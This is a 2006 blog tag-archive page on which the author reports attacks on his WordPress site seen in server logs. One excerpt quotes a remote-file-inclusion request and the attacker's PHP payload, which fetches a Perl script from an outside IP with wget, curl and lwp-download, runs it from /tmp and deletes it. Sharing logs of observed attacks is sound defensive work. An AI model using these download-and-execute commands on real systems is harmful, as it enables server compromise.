Tag Archives: Cross Site Scripting

CIA currently under attack.

2006.12.30 – 4:34 pm PST

Well as an update to that lame hack attempt from last week. Here are the logs of a continuing attack, which is still going on at this time. I would look into it further but, I have a huge headache, and my ability to sit up right at the moment is painful. [...]

By px | Posted in internet | Also tagged , , , , , , , , |

lame xss hack attempt.

2006.12.25 – 6:43 am PST

I just happened to catch this in my logs. It almost seems like they thought I was using Tucows blogware hosting. Hmm. But I use wordpress. Ohwell, it’s Christmas, I’m bored as fuck, so here is the nitty gritty that I can figure out.

==> /var/log/apache2/fwd.ns1.net_access_log < ==
fwd.ns1.net besthost5.com - - [25/Dec/2006:05:55:10 [...]

By px | Posted in internet | Also tagged , , , , , |

someone being bad

2006.09.07 – 8:22 pm PDT

I noticed someone/thing trying to do something nasty to my wordpress install. Good thing nothing happened.

px.ns1.net 217.9.84.137 - - [07/Sep/2006:19:25:33 -0700] "GET //tags/tags.php?BBCodeFile=http://208.10.22.70/spread.txt? HTTP/1.1" 404 37655 "-" "libwww-perl/5.79" -/- (-%) VLOG=-

The payload of the file is.

< ?
passthru(’cd /tmp;wget http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*’);
passthru(’cd /tmp;curl -O http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*’);
passthru(’cd /tmp;lwp-download http://208.10.22.70/images/shbb.txt;perl shbb.txt;rm -f shbb.txt*’);
passthru(’cd /tmp;lynx [...]

By px | Posted in WordPress, internet, software | Also tagged , |

Bad Behavior has blocked 822 access attempts in the last 7 days.

>>>>>>> .r246